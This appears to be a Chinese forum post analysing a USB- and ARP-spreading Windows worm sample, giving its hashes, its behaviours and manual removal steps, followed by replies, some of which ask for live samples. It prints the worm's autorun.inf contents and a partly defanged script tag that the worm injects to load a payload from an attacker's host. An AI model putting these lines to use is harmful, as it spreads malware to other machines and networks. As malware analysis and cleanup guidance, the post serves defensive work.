昨晚``5月28日收到的样本``一个MM电脑上抓过来的```早上跟踪了下``
呼```又更新了``头疼````````
以前写的分析:
http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/230a82af1f6619cd7cd92a9d.html
======================================================
Aditional Information
File size: 36435 bytes
MD5: 23d80e8e5c2b7eb19e006e80c9bd4bfb
SHA1: e760703c8776c652b424fa62af945434fb786be5
CRC32    : 9511CA27
RIPEMD160: E78A1F72018D954CF51E08CDC0A1EFAE9F0CD57C
HAVAL(128bit,pass=5): 8AF756D5E8FB386439C81D694B04095E
packers: UPX
Language:Borland Delphi 6.0 - 7.0
======================================================
病毒行为(简单写了```):
1、病毒是一个8位随机数组成的（0—F），其实是本身机子的机器码。运行后释放同名的Dll文件，设置系统全局挂勾。后枚举进程，插入TIMPlatform.exe和Explorer.exe进程（如果有）
Dll的文件在C:\Program Files\Common Files\MicrosoftShared\MSInfo\下，目录下还有个同名的dat文件```
最后还释放了一个.hlp(系统帮助文件），在%Windir%\help\下，44字节的，属性为存档```
（dll文件48723 字节，dat的36435 字节，属性为系统-隐藏-只读）````

2、插入进程的随机8位数.dll检测窗口句柄，并关闭列入病毒名单的“关键字”一些冷门的工具也不放过`````

3、修改IFEO重定向劫持，指向的是：C:\Program Files\Common Files\MicrosoftShared\MSInfo\的Dat文件。

4、破坏安全模式和显示隐藏文件，达到自身防护的目的。

5、释放一个Dl1.exe，创建远程线程并调用IE下载木马，下了一大推，乱乱的````

6、（遍历）每个分区，在跟目录下生成Autorun.inf和随机8位的EXE，达到双击硬盘激活病毒。
Autorun.inf内容为：
[AutoRun]
open=随机8位数.exe
shell\open=打开(&O)
shell\open\Command=随机8位数.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\Command=随机8位数.exe

7、依附宿主的随机8位Dll每隔一段时间刷新，检测自身释放的“同党”和修改的注册表项，如果被修改和删除的话即使其恢复。并监视移动介质盘插入，支持U盘传播`````````

8、修改安全工具（杀软）服务和驱动的启动类型，设置为禁用，并删除其RUN启项，最后还挂了系统自带的防火墙``

9、用安全工具（如果能打开）检测宿主模块时，那么它则卸掉自身，安全工具退出（关闭）时，重新注入。

10、"病毒版本"：在C:\Program Files和C:\WINNT\system32\DirectX，释放一个.ini的文本，里面生成病毒的版本``我生成的是525，也就是5.25日更新的版本。

11、局域ARP挂马````比较“旁门”的技术（开始有点佩服作者）由外部下载的病毒ycnt9.exe，释放的win1ogo.exe，由它监听局域，每5秒刷新从自身机子（被感染的）经过的ARP数据包，并插入一短Js代码`````
代码内容为：
"<script language=javascript src=h**p://google.171738.org/ad2.js></script>"
呵呵，我把Http改为H**p。嗅探范围：192.168.0.1-192.168.0.254，这意味着经过该被感染机子的数据包返回时，是一段被挂马的数据包！！！说简单点就是你浏览的所有网页上都有病毒。后来我点入该网址，是个MD5一样的8位随机病毒，呵呵，病毒名字为“hello.exe”。
这可比访问局域穷举猜口令轻松多了，这也是我佩服作者的地方。````（有点歧义）

12、常驻进程的随机8位数.dll每毫秒刷新，尝试拦截FindWindowExA、mouse_event等信息函数，修改映像命令，发送“假情报”`````向瑞星注册表监控捕捉发送“允许”命令`（不经过用户操作）``````

解决方案：

先到http://free.ys168.com/?gudugengkekao下载工具
SREng、冰刃、PowerRMV 、autoruns、unlocker1.8.5.exe、“显示隐藏文件”（注册表）和“修复安全模式”（注册表）
直接放桌面，后断开网络（这点很重要）然后按步骤```

重要提示：先把所有工具都重命名，不然由于IFEO的影响，无法运行的。例如 7.exe a8u7.exe apoe.exe
（不要有规律````）

1、打开冰刃(改名了吧？！），结束一个8位数字的EXE文件（如有看到，没有则忽略）然后用冰刃的“文件”功能```展开到C:\Program Files\Common Files\Microsoft Shared\MSINFO\下````删除2个8位随机数字的文件。扩展名分别为：dat 和dll````再到%windir%\help\删除同名的.hlp（系统帮助文件图标````大小为44字节）

注意：我测试的时候并不能删除掉（其实是删除后再生成），如果上面用冰刃无法删除的话，那么则用unlocker删除，用法很简单哦（需要安装）。在此之前先把下载下来的"显示隐藏文件"注册表项导入,然后显示所有隐藏文件,到它的目录下用Unlocker解锁删除!

2、这时候所有安全工具等都可以打开了，首先打开PowerRMV，填入：（一次一个，找不到的忽略）
C:\autorun.inf
D:\autorun.inf
E:\autorun.inf
F:\autorun.inf

3、还有autorun.inf指向的病毒，扩展名为exe的。也一并删除！！

4、打开autoruns(改名了吧？！）删除IFEO劫持项``挨个删```

5、下载的SREng，删除下面的：（不一定全）

注册表

<testrun><C:\DOCUME~1\admin\LOCALS~1\Temp\testexe.exe>  []
    <Kvsc><C:\winnt\Kvsc3.exe>  []
    <msccrt><C:\winnt\msccrt.exe>  []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
    <MSDEG32><LYLoader.exe>  []
    <MSDWG32><LYLoadbr.exe>  [N/A]
    <MSDCG32    ><LYLeador.exe>  [N/A]
    <MSDOG32><LYLoador.exe>  [N/A]
    <MSDSG32><LYLoadar.exe>  [N/A]
    <MSDMG32><LYLoadmr.exe>  [N/A]
    <MSDHG32><LYLoadhr.exe>  [N/A]
    <MSDQG32><LYLoadqr.exe>  [N/A]

服务

[Win32 Display Driver / Win32DDS][Stopped/Auto Start]
  <C:\winnt\system32\rundll32.exe windds32.dll,input><Microsoft Corporation>
[Win32 Debug Service / MSDebugsvc][Stopped/Auto Start]
  <C:\winnt\system32\rundll32.exe msdebug.dll,input><Microsoft Corporation>

驱动程序

[Netgroup Packet Filter / NPF][Running/Manual Start]
  <system32\drivers\npf.sys><CACE Technologies>

还有些其他Dll的病毒文件，不记得那么许多了```（后面再用杀软解决）

6、打开注册表，查找随机释放的DLL文件（8位数），找到后删除，我测试时生成的是：
HKEY_CLASSES_ROOT\CLSID\{0A7204B0-04B0-A72E-B0A7-4B0724B0A72E}\InProcServer32\
C:\Program Files\Common Files\Microsoft Shared\MSINFO\04B0A72E.dll

7、下载的注册表导入``修复安全模式和显示隐藏文件项。

上面做完后重装下杀软（技术硬的话，自己重写回注册表，和设置其启动类型），升级最高版本，全盘扫。
======================================================
后话：
古人为什么推崇“德才兼备”？那只是因为有才没德的人，危害更大！！！！！！！
孤独更可靠真诚希望病毒的作者能因此停止更新，学技术是为了帮助更多的人……而不是“搞破坏”````
另附上一些连接：
http://www.antivirus-china.org.cn/law/f3.htm
http://www.antivirus-china.org.cn/law/f2.htm
http://www.antivirus-china.org.cn/law/fagui.htm
http://tech.163.com/07/0312/18/39DEG9K1000915BF.html
http://www.infosec.org.cn/news/news_detail.php?mID=8845



















感觉真的好累````

辛苦，，顶，，，学习了解。。。。

学习一下，Program lanch 是什么类型软件呢？追踪软件？

学习......
到目前为止  还没中过

变得太快了，快得我都要没兴趣看这些东西了。

样本，我要玩

正需要这个!谢谢了!

【回复“孤独更可靠”的帖子】
目前为止，还没遇到IceSword杀不了的worm.pabug变种。
有新货，请发到：baohelin@yahoo.com.cn
谢谢！
顺便鄙视一下这个病毒的作者。

引用:

【baohe的贴子】【回复“孤独更可靠”的帖子】 目前为止，还没遇到IceSword杀不了的worm.pabug变种。 有新货，请发到：baohelin@yahoo.com.cn 谢谢！ 顺便鄙视一下这个病毒的作者。 ………………

老大,前天和Ghost.pif以前发过去拉!

一共是2个随机8位数的.exe

一个是UPX壳的(原汁原味),另一个我脱好后的,MD5发生变化了

没有收到么?

孤独更可靠，你好！
你在百度和这里发表的杀毒过程我也看过了，请问可以将你获得的关于这个毒病的样版发给我好吗？我也想虚拟机机试试看，这样我可以更好的学会怎么用SSM各TINY了。
邮箱地址：xosxon@gmail.com
谢谢！